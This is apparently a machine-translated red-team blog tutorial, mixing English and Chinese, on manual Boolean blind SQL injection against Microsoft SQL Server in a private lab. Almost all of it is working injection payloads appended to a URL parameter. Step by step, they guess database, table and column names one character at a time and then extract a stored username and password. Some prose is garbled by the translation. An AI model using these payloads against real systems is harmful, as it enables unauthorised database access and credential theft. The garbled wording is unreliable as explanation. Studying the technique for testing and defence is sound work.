saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Note the hands of Microsoft SQL Server Boolean blind
Note START determines whether there
'
and 1=1
and 1=2
Guess database name
First guess dbid exists:
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
The above statement means that this query dbid=5 is present, the last one =1is whether there is a meaning! Description existence returns to normal!
Because I built two databases: test(dbid5), saulgoodman(dbid6)
So we can check out his existence dbid6:
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6)=1
Query dbid7, then it will return an error: because it does not exist
According dbid guess the name of the library, the first to guess the length
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1
Because our dbid5database name is test, he's length 4! dbid=5 and len(name)=4 This statement means that the query dbid=5 whether the length of the database name =4, that it return to normal length =4!
http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1
We query dbid6the database name is saulgoodman, he's length 11! dbid=6 and len(name)=11 This statement means that the query dbid=6 whether the length of the database name =11, that it return to normal length =11! And so on more than one database query length names!
According dbid queries one by one to query the database name
PS: substring(str,start,len) intercepting effect of the string, the first string to be taken as a parameter, the second parameter is taken where to start, the third parameter is the length taken
ascii(char) The 字符converted asciivalue
Because our dbid5database name test, his first character tis ASCIIcode 116, we can use the following statement to determine:
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116
Followed by the query:
第二个字符:e
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101
第三个字符:s
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115
第四个字符:t
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),4,1)) = 116
So we guess solution database called out: test!
If you want to second guess the name of the database, then then it dbidchanges to 6, and then follow the above operation is repeated enough!
Guess the table name
Because we know the database name test, and then we can use the following statement to query whether the length of a table name equal 5(table name users):
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1
Seen from the figure, the page description its return to normal length 5, so we can guess his character one by one:users
猜解第一个字符:u
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1
猜解第二个字符:s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1
猜解第三个字符:e
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1
猜解第四个字符:r
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1
猜解第五个字符:s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1
Because we know that the database name is the testfirst 一one 表名is users, and then we can use the following statement to query the first 二two 表名characters (table name info):
猜解第一个字符:i
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1
猜解第二个字符:n
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1
猜解第三个字符:f
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1
猜解第二个字符:o
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1
Guess the column name
Because we know the table name users, then we can guess users the table column name column name is the name :( username)
猜解列名第一个字符:u
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)
猜解列名第二个字符:s
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)
猜解列名第三个字符:e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)
猜解列名第四个字符:r
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)
猜解列名第五个字符:n
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)
猜解列名第六个字符:a
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)
猜解列名第七个字符:m
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)
猜解列名第八个字符:e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)
This guess solution out of the 一column name username!
The second way: we have id, username, password, age four columns
Gets the first column is the column name :( id)
获取第一个字符:i
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105
获取第二个字符:d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100
Obtaining a second column is the column name :( username)
获取第一个字符:u
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117
获取第二个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115
获取第三个字符:e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101
获取第四个字符:r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114
获取第五个字符:n
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110
获取第六个字符:a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97
获取第七个字符:m
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109
获取第八个字符:e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101
Gets the third column is the column name :( password)
获取第一个字符:p
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112
获取第二个字符:a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97
获取第三个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115
获取第四个字符:s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115
获取第五个字符:w
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119
获取第六个字符:o
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111
获取第七个字符:r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114
获取第八个字符:d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100
If you want to get the first 四row, then continue in the back plus a judgment statements: and name not in ('列名') on it!
retrieve data
and ascii(substring((select top 1 列名 from 表名),N,1)) >= 65
We know the table name: usersthe column name is: username, passwrdthen we started the burst data :( saul)
判断username列第一个字符:s
and ascii(substring((select top 1 username from users),1,1)) = 115
判断username列第二个字符:a
and ascii(substring((select top 1 username from users),2,1)) = 97
判断username列第三个字符:u
and ascii(substring((select top 1 username from users),3,1)) = 117
判断username列第四个字符:l
and ascii(substring((select top 1 username from users),4,1)) =108
This will get to the first user name:saul
Obtain saul passwords :( password saul520)
判断 password 列第一个字符:s
and ascii(substring((select top 1 password from users),1,1)) =115
判断 password 列第二个字符:a
and ascii(substring((select top 1 password from users),2,1)) =97
判断 password 列第三个字符:u
and ascii(substring((select top 1 password from users),3,1)) =117
判断 password 列第四个字符:l
and ascii(substring((select top 1 password from users),4,1)) =108
判断 password 列第五个字符:5
and ascii(substring((select top 1 password from users),5,1)) =53
判断 password 列第六个字符:2
and ascii(substring((select top 1 password from users),6,1)) =50
判断 password 列第七个字符:0
and ascii(substring((select top 1 password from users),7,1)) =48
Since hieroglyphics Mssqlmanual injection of 布尔盲注it here -
